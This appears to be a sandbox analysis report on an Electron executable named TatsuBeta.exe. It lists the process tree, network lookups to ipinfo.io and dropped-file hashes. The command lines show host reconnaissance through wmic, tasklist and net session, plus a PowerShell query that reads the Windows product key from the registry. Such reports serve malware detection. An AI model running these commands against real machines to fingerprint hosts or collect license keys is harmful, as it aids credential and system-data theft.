C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2676 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1568 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1600 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files

\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\d3dcompiler_47.dll

MD5 7ed683df31c5c384d451e11dd9581643
SHA1 90a30ea449e055f5fc61642bb64f2178f1ea2afc
SHA256 0bb1138ffb3009a1aa20496cd3a3edf172e15528ae527c9b3824f3517d49fbbe
SHA512 e7cd656351b10aa33a6995aee586f8ab4ddbe40173afa89a763bef308dcb9674dadd0a68b041d51b6b91e1b4951970895c78eee78844b0a72185aa26a2a86ca1

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\ffmpeg.dll

MD5 b122a4295718cff776e0c8cca1e170e4
SHA1 f458d637723bebf72f78f4f839b2e3937a379b26
SHA256 220ef2608ca6bf7ed47ac658954c6eb9d72ba41319bc865f3af4fffe1171ca60
SHA512 99a7befd9decc155fabb8c7f84c7569dc2d49f773192c01c3d424d64a703d123ff767b80615a8eccc0e18ec2b9ba02d9c0333c61cfcdda53dddc396c2e77fd5f

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\icudtl.dat

MD5 20fe554e470036f72dc88030faca96b9
SHA1 7842536c78a3f46ab5043d51981c8c1d83e49fca
SHA256 561c23fd781db209a56e919ef9520738fb1a515f00b98d15707abbceebf2c55c
SHA512 82870d2688ea895da952de660e08a1a6ad868c8095a65c1c0ef5d8cef49ef97a6afc11c3e3d3a5ac3e35bbe18122745d9e1007a9cff302565aac20f8adbcb398

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\libEGL.dll

MD5 fabc6e983ca1fe61e58c577e0bda8863
SHA1 549e3824925e8fd6e8b08503e4918914a8aa1441
SHA256 0cc6edef9f101227b625f9faf5bb4ca5c4d0b57a4d0b13f1a1e10886e29fe942
SHA512 2825dc3dfc9afc32f98399e58aba490a57953265b58f75832e888febfd9a72f559e8aa086afcb93d8783c80bd559bd075b189093df22da8ed490896eaf3ea875

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\libGLESv2.dll

MD5 2114868291ce216bb775fb6d55359f8f
SHA1 287f7819f5fd8b3566344f4cb9f16bd9dfcec7c8
SHA256 4bfd687745ae6130e5fa8b19dca6b550fcef8e2d68de192584c47e4751b6440c
SHA512 ebcfd21d04ee733c6c9af517ef38e982f437505569acaedf5c8a4ea80161e8c32a107b02b9e14d7b3085d70ea3ad6318a0dbce56e58236cb9d450a4361cabe19

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\LICENSES.chromium.html

MD5 521a420802934141a150297f89c62d02
SHA1 6ab2957aa52ec98108a596c2ef3c05b023414fa1
SHA256 cd912a94645833a134757367c81589d782d9409f604587034a2d7ae716921312
SHA512 796cf5b8f7a1e339149052808e3346e038c61b1c6a18d5c8fc47cd9be01699148a969a71bdeccf07deed9fe9e55d2695cb818b94802f35a245d13e2b7c88174d

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\snapshot_blob.bin

MD5 416c2eeccf80edd9df104364da8b37d7
SHA1 6501e5728a54487344a1131a02ef798e5c52bbeb
SHA256 e10cc7bdde43e70785a2061bc2da22a27d455aa75f3fbd692e4edf7a96df4152
SHA512 02c91858530d6d35b21851378da07acfd63f7e04aadfb27726f6d3c3802335a70f92cb27b0ad815a4d98b21c39575d95556cf15b40d48d857f9a4b34b2c56c71

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources.pak

MD5 2435b011146c3b1f34684165895b897b
SHA1 e3c1fd0094d046bdf466ba91d8c0c785d96f0338
SHA256 3af3295f3b56263903755af77c922c97951568a5a58c1f1f931188bddca49601
SHA512 134678a766debe5f8520de6c66667164e3a470c784dbf174b4c738fb89b657eadc2ac45ddcbad63521c58b2d7551e70cbebf0a445afe7a10b1cae3133ecd860d

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\TatsuBeta.exe

MD5 e93e6477b8a6be38f15f55596f413ca3
SHA1 77b1167c02e1bad7dee21250ba4dddef054361b9
SHA256 ade8b647a3626cc645ab5c0f30996248d707490af8903b62c2780fa2f1d0e0f1
SHA512 38a9944556a21c9bb54667af211094beaa4b9eecff918005c34d1638b9406b09b693586f502a02d795563f2ff8e719f07e5ee0718e8b7fbcb7f5e51336c8cc71

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vk_swiftshader.dll

MD5 fcc8b529f3ebf5974305f7af3c84aa47
SHA1 c4119c747f35ae6c6b15936951ae804743ddcf97
SHA256 6db406d7de79513a2f4c0c5aac7e23ffb50fd9a9c1a1855d25e899cd50d8ad99
SHA512 7ddb8da2e6662167849b71b80378fe1031022a574196e163bbafaec6c46e75093aec93379563c5e3d304b5471addcac7efdd6ad0dbb70d344086a696db9b2f69

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

